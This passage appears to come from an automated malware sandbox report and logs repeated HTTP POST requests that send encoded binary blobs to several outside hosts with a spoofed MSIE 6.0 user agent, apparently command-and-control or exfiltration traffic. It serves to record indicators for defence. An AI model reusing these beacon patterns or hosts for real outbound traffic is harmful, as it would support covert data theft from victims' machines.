31 56 71 61 2b 38 71 54 63 31 47 73 64 6c 4f 45 48 64 6c 6e 6b 67 65 44 49 70 47 43 31 4c 46 53 55 68 66 4d 37 6e 30 51 67 68 79 47 33 6e 42 4e 41 49 49 69 4c 6b 6d 45 4d 50 71 55 57 5a 69 65 59 72 30 4b 70 76 73 4e 72 55 72 72 55 58 53 69 66 76 44 44 69 71 69 57 59 4d 67 72 31 32 62 76 2b 47 69 38 79 4a 62 57 4a 43 37 74 6d 61 36 44 2f 41 7a 6b 4b 35 36 5a 6d 62 68 44 5a 5a 35 6a 43 59 54 5a 72 66 57 72 54 50 67 38 51 73 30 73 72 69 6b 68 77 4d 4f 64 45 4e 52 75 4b 73 37 43 45 76 42 53 78 4e 78 52 73 47 6d 39 4d 36 68 38 52 61 79 64 2b 45 30 63 52 4a 4b 6d 41 66 32 77 62 75 46 51 71 6a 37 4d 4f 68 78 4a 50 68 34 49 6a 6a 75 38 4f 37 6f 52 59 37 59 42 4e 6b 67 56 30 45 68 48 61 32 68 49 30 30 7a 77 2f 76 37 72 43 58 33 74 57 31 58 4c 38 5a 67 64 77 6a 75 69 54 45 6a 54 61 56 6e 6a 35 4b 38 6b 6a 58 36 5a 43 49 42 6f 41 35 62 64 43 57 4a 53 33 67 70 50 37 4b 42 6b 4d 6f 78 6b 5a 7a 39 75 34 76 57 4b 71 73 42 41 6c 49 53 73 6e 71 67 75 35 4a 6c 4a 7a 35 79 2b 32 4b 70 76 6e 59 43 53 45 65 51 38 42 39 53 56 46 68 67 30 4c 48 45 62 55 46 76 35 4e 34 38 46 61 68 71 79 2f 47 39 62 61 35 79 37 51 7a 36 6e 59 77 59 4b 5a 74 52 67 47 31 47 67 38 64 69 37 69 6a 78 5a 2f 4d 59 54 77 49 5a 64 6b 34 2b 43 4f 6a 35 4b 43 70 69 71 74 36 76 45 4e 74 6e Data Ascii: qR+6eXPKC9DCNeF0ug3tRBwhAnrZIV22V2ev4Mlo2IDlqZdBsEkKejbHABXU+3m8L4vEEe/pBnF0me3ne+e5VO/21Ypl//FSRDIyEk2c7bbupxjdrgKJ1t/ot1Vqa+8qTc1GsdlOEHdlnkgeDIpGC1LFSUhfM7n0QghyG3nBNAIIiLkmEMPqUWZieYr0KpvsNrUrrUXSifvDDiqiWYMgr12bv+Gi8yJbWJC7tma6D/AzkK56ZmbhDZZ5jCYTZrfWrTPg8Qs0srikhwMOdENRuKs7CEvBSxNxRsGm9M6h8Rayd+E0cRJKmAf2wbuFQqj7MOhxJPh4Ijju8O7oRY7YBNkgV0EhHa2hI00zw/v7rCX3tW1XL8ZgdwjuiTEjTaVnj5K8kjX6ZCIBoA5bdCWJS3gpP7KBkMoxkZz9u4vWKqsBAlISsnqgu5JlJz5y+2KpvnYCSEeQ8B9SVFhg0LHEbUFv5N48Fahqy/G9ba5y7Qz6nYwYKZtRgG1Gg8di7ijxZ/MYTwIZdk4+COj5KCpiqt6vENtn
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 52 62 33 65 2b 63 54 7a 44 39 41 7a 50 4c 70 68 33 32 79 43 39 70 65 48 55 6b 7a 38 46 33 38 4a 4f 4f 57 63 42 4b 49 37 5a 6f 6e 6c 66 6e 73 30 64 55 41 78 69 33 69 66 53 4b 6a 65 39 77 36 49 35 64 6e 6b 45 6b 41 77 52 4d 68 47 6e 4e 73 53 67 4f 48 5a 4b 70 44 67 57 6e 71 67 72 72 75 38 36 57 6e 59 32 66 6d 56 50 41 66 48 68 79 4a 77 63 6f 74 46 73 50 6d 6d 42 33 77 73 70 57 4f 6b 4a 51 4d 32 38 69 45 63 6c 62 54 6c 4a 6d 47 39 59 4d 74 71 63 6c 56 58 64 76 68 37 30 36 6f 55 39 6d 77 6e 2f 39 73 54 45 56 61 7a 2b 4a 6c 50 39 43 6a 50 49 5a 41 44 2b 7a 6c 42 6d 38 57 6c 48 70 43 65 6f 68 6f 47 43 48 33 68 48 4f 57 6c 41 53 6c 53 57 38 33 74 30 36 46 45 53 41 6b 32 66 38 71 6d 35 42 61 4d 69 5a 54 36 4b 5a 63 75 75 6a 72 4f 73 66 58 65 68 55 46 4a 48 49 2b 63 78 74 70 63 54 2f 56 6d 67 36 59 42 63 36 59 58 79 73 6f 59 69 4d 34 57 53 59 6d 7a 45 4b 6f 70 55 78 30 37 38 4e 63 48 64 6d 56 57 45 66 54 46 64 48 57 4a 31 54 78 74 48 33 2b 57 69 55 52 77 4d 43 6e 46 49 77 59 61 4e 49 37 76 4e 79 39 72 66 70 4e 71 61 46 58 75 59 74 76 30 7a 65 74 30 35 4e 7a 45 74 2f 51 2f 66 54 66 46 36 6a 5a 4e 66 2f 65 34 2f 66 2b 30 2f 30 77 64 56 6f 56 4c 58 51 57 33 4b 55 74 44 38 58 76 67 2b 53 45 4a 4d 4a 31 7a 4c 32 47 30 68 58 61 4d 35 65 38 6c 42 45 58 35 34 4f 2b 4f 4d 49 4e 71 2f 50 36 49 75 75 4c 61 4d 44 5a 7a 61 64 33 69 39 4a 55 6d 5a 54 73 62 48 48 52 54 38 45 52 54 75 5a 4b 55 35 34 56 5a 37 58 65 70 56 4e 54 32 53 52 4e 62 4f 33 6b 6e 44 30 69 72 33 53 4d 45 4a 61 67 38 67 56 53 48 37 45 71 31 7a 6f 6b 73 6d 33 46 51 4e 62 77 59 68 30 59 46 66 72 43 6d 6c 2f 72 47 53 69 57 74 6f 68 58 65 52 77 73 71 6b 65 66 69 76 55 6a 71 52 72 6f 34 33 44 5a 77 4b 43 6d 4c 2f 71 34 46 65 6a 57 47 Data Ascii: Rb3e+cTzD9AzPLph32yC9peHUkz8F38JOOWcBKI7Zonlfns0dUAxi3ifSKje9w6I5dnkEkAwRMhGnNsSgOHZKpDgWnqgrru86WnY2fmVPAfHhyJwcotFsPmmB3wspWOkJQM28iEclbTlJmG9YMtqclVXdvh706oU9mwn/9sTEVaz+JlP9CjPIZAD+zlBm8WlHpCeohoGCH3hHOWlASlSW83t06FESAk2f8qm5BaMiZT6KZcuujrOsfXehUFJHI+cxtpcT/Vmg6YBc6YXysoYiM4WSYmzEKopUx078NcHdmVWEfTFdHWJ1TxtH3+WiURwMCnFIwYaNI7vNy9rfpNqaFXuYtv0zet05NzEt/Q/fTfF6jZNf/e4/f+0/0wdVoVLXQW3KUtD8Xvg+SEJMJ1zL2G0hXaM5e8lBEX54O+OMINq/P6IuuLaMDZzad3i9JUmZTsbHHRT8ERTuZKU54VZ7XepVNT2SRNbO3knD0ir3SMEJag8gVSH7Eq1zoksm3FQNbwYh0YFfrCml/rGSiWtohXeRwsqkefivUjqRro43DZwKCmL/q4FejWG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 2b 63 45 72 73 65 6a 32 2f 4d 39 6b 46 38 35 6f 71 2b 31 50 73 31 75 4b 79 6c 6a 77 30 39 58 42 6e 43 43 30 6c 35 6e 2b 49 4e 46 69 61 4d 38 32 32 35 4a 6c 2b 38 36 46 38 76 74 73 57 6b 44 6e 30 64 72 36 45 66 75 33 66 74 33 6c 4d 4c 36 76 5a 79 4b 6e 4e 6f 77 35 6b 62 4b 54 4e 66 35 46 66 6f 5a 4b 78 55 49 67 67 55 38 2f 33 74 4b 4a 5a 65 2b 6a 65 45 48 76 4a 50 31 68 6e 56 4a 2f 71 31 7a 39 71 6a 4b 53 4b 6e 42 5a 43 32 38 55 45 72 47 78 4a 76 6d 61 59 37 4b 61 77 59 2b 41 34 74 52 4f 48 41 5a 79 6e 55 55 45 54 48 66 36 39 59 4f 63 41 49 39 75 42 79 54 45 33 75 57 62 4d 4e 4d 54 66 5a 65 51 62 63 79 5a 4a 59 37 35 76 67 63 2f 75 77 6b 5a 6e 48 72 71 44 36 74 67 52 36 68 6c 79 53 72 71 2b 2f 45 41 6d 6a 50 31 6b 58 72 6b 73 39 45 6c 76 45 4c 33 57 59 55 76 73 49 4b 70 42 52 72 44 68 78 51 53 7a 50 62 75 39 71 37 55 66 69 5a 6b 36 31 4c 64 55 76 4e 6d 69 4f 4d 46 30 75 5a 42 49 37 77 78 73 4a 69 6f 36 43 79 6c 44 71 79 49 41 35 72 64 32 54 46 31 66 4e 55 64 31 65 35 4b 6f 4c 6f 52 67 78 34 43 53 2b 4c 4f 4c 62 77 75 70 70 52 67 36 6e 57 37 32 52 57 4b 7a 44 2b 79 46 41 4e 69 6e 74 70 34 72 59 78 42 37 64 34 64 74 5a 69 61 32 48 42 50 79 65 61 52 47 36 42 41 48 66 38 71 4a 4b 51 43 4f 4b 67 30 64 37 79 67 44 56 4d 2f 75 69 67 6f 69 54 4d 41 66 35 46 68 47 4a 6b 6c 7a 4a 42 47 41 4e 75 51 70 2f 55 47 44 75 69 61 75 63 6c 63 49 5a 4e 38 50 4e 73 6e 78 49 50 58 58 49 36 31 65 74 4d 2b 50 52 32 61 65 64 2f 6f 57 77 6e 33 47 70 38 2b 44 62 4f 6e 2b 6c 57 63 38 45 57 2f 53 4c 57 4a 6e 34 2b 62 54 49 50 2f 48 65 67 71 32 75 39 4d 31 38 43 53 6e 61 6c 63 30 39 72 65 7a 46 35 31 2b 73 56 48 6d 41 35 38 75 48 35 4f 70 65 57 78 70 50 61 68 76 66 77 73 31 67 49 6a 78 78 44 35 6b 72 4b 57 67 4f 66 6e 57 52 41 6c 79 43 35 67 39 41 3d 3d Data Ascii: +cErsej2/M9kF85oq+1Ps1uKyljw09XBnCC0l5n+INFiaM8225Jl+86F8vtsWkDn0dr6Efu3ft3lML6vZyKnNow5kbKTNf5FfoZKxUIggU8/3tKJZe+jeEHvJP1hnVJ/q1z9qjKSKnBZC28UErGxJvmaY7KawY+A4tROHAZynUUETHf69YOcAI9uByTE3uWbMNMTfZeQbcyZJY75vgc/uwkZnHrqD6tgR6hlySrq+/EAmjP1kXrks9ElvEL3WYUvsIKpBRrDhxQSzPbu9q7UfiZk61LdUvNmiOMF0uZBI7wxsJio6CylDqyIA5rd2TF1fNUd1e5KoLoRgx4CS+LOLbwuppRg6nW72RWKzD+yFANintp4rYxB7d4dtZia2HBPyeaRG6BAHf8qJKQCOKg0d7ygDVM/uigoiTMAf5FhGJklzJBGANuQp/UGDuiauclcIZN8PNsnxIPXXI61etM+PR2aed/oWwn3Gp8+DbOn+lWc8EW/SLWJn4+bTIP/Hegq2u9M18CSnalc09rezF51+sVHmA58uH5OpeWxpPahvfws1gIjxxD5krKWgOfnWRAlyC5g9A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 72 39 6c 4e 48 49 4e 78 41 4e 44 55 7a 73 38 39 69 75 6c 35 44 36 77 75 44 6c 6f 70 54 74 6e 52 5a 33 65 52 49 37 64 4a 50 4b 52 5a 7a 50 53 46 6a 65 4a 72 6b 68 74 76 54 6b 34 50 4b 75 63 77 45 6b 6e 49 2b 6f 72 71 33 41 2b 64 47 76 42 49 66 43 45 6c 78 72 67 68 47 79 77 4f 49 30 53 33 44 55 61 62 31 4d 69 76 59 73 38 54 64 46 42 61 76 4e 57 5a 53 59 44 34 5a 2b 53 48 46 69 51 66 4d 33 43 5a 36 36 6d 58 38 44 73 67 33 57 70 4d 48 79 50 65 43 6d 47 75 6b 47 79 70 68 6f 66 4c 79 54 69 34 4a 66 38 59 33 36 6d 30 43 47 31 74 61 78 56 55 6f 64 37 47 66 63 76 6b 46 49 79 2b 5a 36 53 44 76 33 51 47 76 68 72 35 4b 58 44 74 39 6b 5a 33 77 32 6d 58 59 47 41 70 30 63 4e 70 71 56 55 4b 45 4d 30 76 66 4e 6b 79 47 6e 4a 57 78 38 75 31 61 71 31 56 33 62 6f 58 54 57 63 5a 69 6b 38 66 33 4e 58 4c 32 32 67 6b 54 31 38 53 41 52 53 45 33 5a 2b 46 56 53 65 77 37 42 78 6a 68 51 34 6d 37 54 52 54 43 76 36 69 55 51 42 4a 48 4e 76 45 55 76 6c 2f 65 75 48 58 70 71 7a 6f 61 4c 78 52 65 6c 62 56 54 4f 2b 58 4d 7a 32 65 32 2f 5a 6b 51 76 54 62 41 4c 71 4d 31 4d 53 6a 65 6d 63 78 71 71 39 6b 4e 6c 77 4a 4e 58 2b 67 61 71 38 75 67 77 79 30 42 78 73 66 76 33 50 7a 31 6e 2f 33 6b 33 79 36 44 55 78 36 56 70 66 5a 49 53 33 70 56 30 52 4d 54 51 55 67 77 62 53 52 72 4f 43 34 35 6d 65 6e 4e 69 35 65 31 79 39 69 6c 7a 55 33 58 62 66 47 61 2b 51 49 63 4d 71 50 50 70 63 55 51 54 2b 6c 36 6b 4d 43 66 57 6e 47 4f 50 4e 69 6b 48 4b 63 65 74 6d 78 66 2b 70 43 44 45 78 4f 54 71 4d 51 49 66 5a 39 64 4d 65 50 56 75 57 53 33 79 39 35 4c 2b 5a 38 68 4e 46 77 49 73 78 46 41 51 36 39 59 41 71 46 53 50 70 62 77 69 63 44 34 62 59 48 57 6e 57 41 7a 61 59 4a 33 70 4f 77 63 42 79 34 4d 6b 54 7a 4c 43 34 52 45 44 73 75 35 48 37 39 62 57 6c 39 45 69 55 51 35 4f 4f 69 65 63 67 75 4a 53 75 70 Data Ascii: r9lNHINxANDUzs89iul5D6wuDlopTtnRZ3eRI7dJPKRZzPSFjeJrkhtvTk4PKucwEknI+orq3A+dGvBIfCElxrghGywOI0S3DUab1MivYs8TdFBavNWZSYD4Z+SHFiQfM3CZ66mX8Dsg3WpMHyPeCmGukGyphofLyTi4Jf8Y36m0CG1taxVUod7GfcvkFIy+Z6SDv3QGvhr5KXDt9kZ3w2mXYGAp0cNpqVUKEM0vfNkyGnJWx8u1aq1V3boXTWcZik8f3NXL22gkT18SARSE3Z+FVSew7BxjhQ4m7TRTCv6iUQBJHNvEUvl/euHXpqzoaLxRelbVTO+XMz2e2/ZkQvTbALqM1MSjemcxqq9kNlwJNX+gaq8ugwy0Bxsfv3Pz1n/3k3y6DUx6VpfZIS3pV0RMTQUgwbSRrOC45menNi5e1y9ilzU3XbfGa+QIcMqPPpcUQT+l6kMCfWnGOPNikHKcetmxf+pCDExOTqMQIfZ9dMePVuWS3y95L+Z8hNFwIsxFAQ69YAqFSPpbwicD4bYHWnWAzaYJ3pOwcBy4MkTzLC4REDsu5H79bWl9EiUQ5OOiecguJSup
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 34 4a 7a 77 65 54 54 4d 43 39 44 6f 58 4b 37 69 6a 77 70 35 63 59 65 6c 33 44 4d 73 73 58 67 6c 71 45 78 2b 66 34 59 70 63 47 65 66 78 6c 50 44 45 54 2b 75 30 64 33 64 55 71 59 2f 4c 79 71 4a 39 30 46 49 6e 46 39 77 2f 45 6f 63 68 36 4c 68 46 4e 36 4e 6c 72 51 64 63 47 50 5a 41 32 57 72 46 36 74 6c 4f 35 68 4a 58 69 68 56 4d 7a 50 66 55 35 6e 7a 38 6f 71 4f 49 6a 7a 4c 58 38 4a 67 57 57 2b 6f 6e 4e 46 49 4a 64 6a 58 36 37 55 79 37 51 67 75 51 50 75 31 71 50 66 63 47 56 34 56 44 79 65 38 45 44 65 47 47 41 57 4c 2b 4d 45 2b 55 30 71 53 4c 6d 76 57 33 2b 62 5a 76 59 4d 57 45 55 4f 65 6d 65 62 69 76 56 6a 36 2f 37 47 67 65 63 38 42 50 46 4b 75 56 50 49 68 6d 64 4a 5a 42 6c 51 39 72 6a 75 4d 46 51 56 48 75 63 4b 75 4a 73 4e 75 47 73 6e 68 32 2b 4d 44 54 56 77 70 35 6e 43 31 6d 69 71 50 37 52 67 70 44 4c 49 53 4d 63 79 33 6b 33 56 72 6d 6f 63 4d 63 73 6a 64 6d 50 39 4d 68 45 59 73 4d 6f 53 35 32 5a 56 4f 64 65 7a 68 34 77 59 6c 50 66 48 59 2b 4a 70 36 4a 69 5a 55 51 73 34 57 4b 6d 7a 5a 47 54 66 58 73 4a 68 43 44 6d 7a 51 38 34 52 65 79 7a 52 55 6f 74 54 76 42 7a 6a 61 6a 35 68 48 74 73 76 51 6a 59 4d 69 51 69 56 52 77 68 54 6f 38 73 68 36 38 76 46 56 32 72 68 47 48 42 49 59 31 6a 35 45 35 55 31 53 59 59 65 6a 52 69 77 79 61 67 61 58 52 4a 57 37 4b 4c 52 48 70 74 2b 36 71 47 52 66 4a 77 36 35 39 68 73 62 49 54 63 4f 47 56 31 66 63 38 34 77 51 72 61 78 59 71 6e 53 31 71 4c 45 56 6c 35 71 55 37 49 52 69 67 41 6f 49 41 75 48 45 71 6d 77 6a 68 4e 37 75 67 37 59 42 37 68 34 41 4e 63 4c 63 4d 47 45 4a 43 54 5a 45 38 38 5a 33 34 71 6f 6b 5a 74 54 50 72 58 56 4a 71 33 35 75 79 74 6b 5a 53 63 44 45 44 6f 3d Data Ascii: 4JzweTTMC9DoXK7ijwp5cYel3DMssXglqEx+f4YpcGefxlPDET+u0d3dUqY/LyqJ90FInF9w/Eoch6LhFN6NlrQdcGPZA2WrF6tlO5hJXihVMzPfU5nz8oqOIjzLX8JgWW+onNFIJdjX67Uy7QguQPu1qPfcGV4VDye8EDeGGAWL+ME+U0qSLmvW3+bZvYMWEUOemebivVj6/7Ggec8BPFKuVPIhmdJZBlQ9rjuMFQVHucKuJsNuGsnh2+MDTVwp5nC1miqP7RgpDLISMcy3k3VrmocMcsjdmP9MhEYsMoS52ZVOdezh4wYlPfHY+Jp6JiZUQs4WKmzZGTfXsJhCDmzQ84ReyzRUotTvBzjaj5hHtsvQjYMiQiVRwhTo8sh68vFV2rhGHBIY1j5E5U1SYYejRiwyagaXRJW7KLRHpt+6qGRfJw659hsbITcOGV1fc84wQraxYqnS1qLEVl5qU7IRigAoIAuHEqmwjhN7ug7YB7h4ANcLcMGEJCTZE88Z34qokZtTPrXVJq35uytkZScDEDo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 35 49 31 50 48 34 65 4b 41 4e 42 6c 77 66 30 76 74 73 62 57 69 6c 41 69 2f 44 64 39 74 51 57 78 71 7a 34 57 4d 55 65 50 32 2f 61 74 46 59 65 63 61 68 30 75 65 4c 79 77 75 53 4f 71 4a 61 7a 2b 31 50 4c 78 4e 39 48 46 6a 34 75 74 53 4c 4c 35 77 6e 59 73 52 6f 72 68 78 36 64 77 79 70 34 44 51 44 43 34 38 57 73 48 2f 50 71 78 52 4f 73 70 67 36 77 7a 58 36 6a 6f 70 69 56 50 73 52 6c 35 46 56 67 7a 79 59 4a 49 58 64 58 76 2f 73 32 64 38 63 39 45 79 55 51 74 38 2b 43 7a 47 5a 2f 36 68 39 4e 43 76 74 6e 6b 67 52 77 6f 4c 59 74 38 69 4e 6f 51 6d 6e 78 36 72 44 62 42 4e 37 6e 34 7a 53 30 6b 50 44 61 7a 43 50 6f 68 6f 2b 54 50 7a 4b 49 53 76 64 39 62 47 77 37 37 6c 43 47 38 54 77 6f 44 65 69 53 71 4a 49 48 73 2b 2b 74 5a 72 48 34 66 6c 65 42 78 6b 4f 6b 4a 6e 62 46 76 73 36 34 63 48 78 47 6b 7a 64 56 4e 59 6e 5a 33 42 76 59 46 34 46 44 59 75 33 6b 57 71 6e 71 67 70 59 50 6f 45 7a 6c 2f 44 54 34 30 6e 74 51 61 68 4c 30 6d 65 4b 61 75 52 2f 58 39 56 71 41 31 64 79 75 63 48 34 67 6b 53 74 39 37 35 59 2b 67 55 65 64 56 46 38 55 4d 70 64 47 35 42 2f 59 50 46 61 76 75 6c 49 72 61 56 56 6a 45 66 67 37 32 78 58 46 41 58 69 34 46 48 73 4c 59 44 4a 37 6d 6f 30 49 35 46 6d 55 65 61 48 63 74 6d 73 5a 37 39 6d 56 71 31 4c 56 51 64 72 41 66 41 6a 68 74 70 64 6e 63 70 59 54 70 64 46 45 45 69 4d 79 7a 57 61 5a 6c 55 4d 4e 41 6a 30 30 30 70 59 51 4f 69 4f 4d 51 7a 42 67 78 4b 75 51 50 72 6e 41 62 75 34 77 6e 72 77 37 7a 76 36 56 6e 6d 59 52 7a 59 74 4d 61 64 6c 73 2b 41 75 56 39 56 79 4e 34 36 2f 6f 4e 58 2b 31 7a 41 57 51 79 55 45 4b 38 6d 64 4a 73 74 65 63 4f 61 79 32 51 4a 6d 32 72 6a 34 33 30 6e 6f 37 64 45 36 78 4e 2f 2b 43 34 37 62 74 74 54 48 74 78 47 61 73 45 6d 4f 69 4c 59 4b 62 59 61 5a 79 36 46 78 30 2b 38 41 3d 3d Data Ascii: 5I1PH4eKANBlwf0vtsbWilAi/Dd9tQWxqz4WMUeP2/atFYecah0ueLywuSOqJaz+1PLxN9HFj4utSLL5wnYsRorhx6dwyp4DQDC48WsH/PqxROspg6wzX6jopiVPsRl5FVgzyYJIXdXv/s2d8c9EyUQt8+CzGZ/6h9NCvtnkgRwoLYt8iNoQmnx6rDbBN7n4zS0kPDazCPoho+TPzKISvd9bGw77lCG8TwoDeiSqJIHs++tZrH4fleBxkOkJnbFvs64cHxGkzdVNYnZ3BvYF4FDYu3kWqnqgpYPoEzl/DT40ntQahL0meKauR/X9VqA1dyucH4gkSt975Y+gUedVF8UMpdG5B/YPFavulIraVVjEfg72xXFAXi4FHsLYDJ7mo0I5FmUeaHctmsZ79mVq1LVQdrAfAjhtpdncpYTpdFEEiMyzWaZlUMNAj000pYQOiOMQzBgxKuQPrnAbu4wnrw7zv6VnmYRzYtMadls+AuV9VyN46/oNX+1zAWQyUEK8mdJstecOay2QJm2rj430no7dE6xN/+C47bttTHtxGasEmOiLYKbYaZy6Fx0+8A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 74 45 79 7a 6e 44 48 74 44 4e 42 78 7a 55 4d 30 55 49 52 68 48 59 70 59 7a 6f 35 76 68 6f 2b 4d 39 55 5a 37 41 58 55 56 4d 51 6e 2f 52 70 64 6b 62 58 46 32 55 6f 64 69 55 42 52 75 44 36 4f 35 70 48 50 6a 61 4b 6b 44 2f 6a 61 31 55 6c 77 39 47 2b 4f 4e 2f 35 78 4d 62 54 4f 72 69 79 72 42 41 30 70 6b 58 36 6f 35 7a 71 2f 43 64 74 55 39 71 72 35 4b 78 5a 47 79 63 44 4f 6e 6c 47 73 41 4f 46 39 46 64 37 49 79 37 35 6d 4f 32 4c 66 68 2b 45 61 31 62 58 6f 64 6f 52 43 77 44 37 73 77 2f 79 48 6b 31 78 52 56 72 47 43 45 30 52 33 39 33 6b 65 73 74 6a 74 42 44 71 63 32 76 35 50 66 73 6a 6e 78 52 52 34 54 79 65 45 4f 61 34 4a 6b 45 46 58 49 61 65 6a 6d 6e 56 42 5a 37 57 45 35 6f 32 71 7a 6a 56 32 6e 73 77 54 4d 6c 71 36 55 47 61 4f 77 6e 2b 46 74 6d 33 72 4a 2b 5a 43 69 6b 45 4f 44 50 52 75 77 35 6f 46 47 32 50 71 48 66 52 6f 6f 42 68 72 50 6c 73 4b 4d 49 43 4e 62 34 71 4b 76 35 74 37 65 78 5a 4f 56 75 33 59 47 52 55 42 53 77 55 6c 51 41 32 4b 71 39 6a 42 68 48 59 46 63 41 2b 73 67 39 32 49 35 4c 54 67 4f 57 74 46 31 54 74 45 4b 6e 6a 5a 53 37 33 4d 47 49 72 79 49 31 4b 6c 6f 6f 38 48 68 6f 33 55 66 68 4b 51 7a 78 71 52 6d 73 47 6d 70 32 48 6a 70 75 65 4a 65 47 7a 2b 72 79 44 75 41 4c 62 50 51 50 46 65 51 78 72 5a 59 31 35 4a 50 33 6d 61 46 49 45 4b 7a 42 48 48 2b 6c 59 4b 42 77 72 54 6a 2b 48 76 51 68 6a 47 52 6c 6a 59 41 59 6e 59 4e 38 69 48 33 48 45 42 56 57 31 79 69 67 42 34 71 76 45 4f 2b 57 63 31 43 6b 2f 69 54 42 56 37 35 66 53 4f 73 54 44 6e 39 44 6d 50 53 4f 5a 4f 52 4b 6d 58 53 70 5a 6e 47 70 46 77 75 48 2b 48 66 69 2b 49 64 7a 41 66 69 50 37 2f 45 4c 67 66 75 44 63 76 4b 4b 67 69 61 4c 55 41 43 36 76 73 36 4a 72 72 61 4b 4b 42 53 44 38 34 2b 4f 59 48 58 69 58 6e 4f 66 45 33 48 6f 43 4e 59 35 57 44 6d 4d 58 42 34 Data Ascii: tEyznDHtDNBxzUM0UIRhHYpYzo5vho+M9UZ7AXUVMQn/RpdkbXF2UodiUBRuD6O5pHPjaKkD/ja1Ulw9G+ON/5xMbTOriyrBA0pkX6o5zq/CdtU9qr5KxZGycDOnlGsAOF9Fd7Iy75mO2Lfh+Ea1bXodoRCwD7sw/yHk1xRVrGCE0R393kestjtBDqc2v5PfsjnxRR4TyeEOa4JkEFXIaejmnVBZ7WE5o2qzjV2nswTMlq6UGaOwn+Ftm3rJ+ZCikEODPRuw5oFG2PqHfRooBhrPlsKMICNb4qKv5t7exZOVu3YGRUBSwUlQA2Kq9jBhHYFcA+sg92I5LTgOWtF1TtEKnjZS73MGIryI1Kloo8Hho3UfhKQzxqRmsGmp2HjpueJeGz+ryDuALbPQPFeQxrZY15JP3maFIEKzBHH+lYKBwrTj+HvQhjGRljYAYnYN8iH3HEBVW1yigB4qvEO+Wc1Ck/iTBV75fSOsTDn9DmPSOZORKmXSpZnGpFwuH+Hfi+IdzAfiP7/ELgfuDcvKKgiaLUAC6vs6JrraKKBSD84+OYHXiXnOfE3HoCNY5WDmMXB4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 52 62 33 65 2b 63 54 7a 44 39 41 7a 50 4c 70 68 33 32 79 43 39 70 65 48 55 6b 7a 38 46 33 38 4a 4f 4f 57 63 42 4b 49 37 5a 6f 6e 6c 66 6e 73 30 64 55 41 78 69 33 69 66 53 4b 6a 65 39 77 36 49 35 64 6e 6b 45 6b 41 77 52 4d 68 47 6e 4e 73 53 67 4f 48 5a 4b 70 44 67 57 6e 71 67 72 72 75 38 36 57 6e 59 32 66 6d 56 50 41 66 48 68 79 4a 77 63 6f 74 46 73 50 6d 6d 42 33 77 73 70 57 4f 6b 4a 51 4d 32 38 69 45 63 6c 62 54 6c 4a 6d 47 39 59 4d 74 71 63 6c 56 58 64 76 68 37 30 36 6f 55 39 6d 77 6e 2f 39 73 54 45 56 61 7a 2b 4a 6c 50 39 43 6a 50 49 5a 41 44 2b 7a 6c 42 6d 38 57 6c 48 70 43 65 6f 68 6f 47 43 48 33 68 48 4f 57 6c 41 53 6c 53 57 38 33 74 30 36 46 45 53 41 6b 32 66 38 71 6d 35 42 61 4d 69 5a 54 36 4b 5a 63 75 75 6a 72 4f 73 66 58 65 68 55 46 4a 48 49 2b 63 78 74 70 63 54 2f 56 6d 67 36 59 42 63 36 59 58 79 73 6f 59 69 4d 34 57 53 59 6d 7a 45 4b 6f 70 55 78 30 37 38 4e 63 48 64 6d 56 57 45 66 54 46 64 48 57 4a 31 54 78 74 48 33 2b 57 69 55 52 77 4d 43 6e 46 49 77 59 61 4e 49 37 76 4e 79 39 72 66 70 4e 71 61 46 58 75 59 74 76 30 7a 65 74 30 35 4e 7a 45 74 2f 51 2f 66 54 66 46 36 6a 5a 4e 66 2f 65 34 2f 66 2b 30 2f 30 77 64 56 6f 56 4c 58 51 57 33 4b 55 74 44 38 58 76 67 2b 53 45 4a 4d 4a 31 7a 4c 32 47 30 68 58 61 4d 35 65 38 6c 42 45 58 35 34 4f 2b 4f 4d 49 4e 71 2f 50 36 49 75 75 4c 61 4d 44 5a 7a 61 64 33 69 39 4a 55 6d 5a 54 73 62 48 48 52 54 38 45 52 54 75 5a 4b 55 35 34 56 5a 37 58 65 70 56 4e 54 32 53 52 4e 62 4f 33 6b 6e 44 30 69 72 33 53 4d 45 4a 61 67 38 67 56 53 48 37 45 71 31 7a 6f 6b 73 6d 33 46 51 4e 62 77 59 68 30 59 46 66 72 43 6d 6c 2f 72 47 53 69 57 74 6f 68 58 65 52 77 73 71 6b 65 66 69 76 55 6a 71 52 72 6f 34 33 44 5a 77 4b 43 6d 4c 2f 71 34 46 65 6a 57 47 Data Ascii: 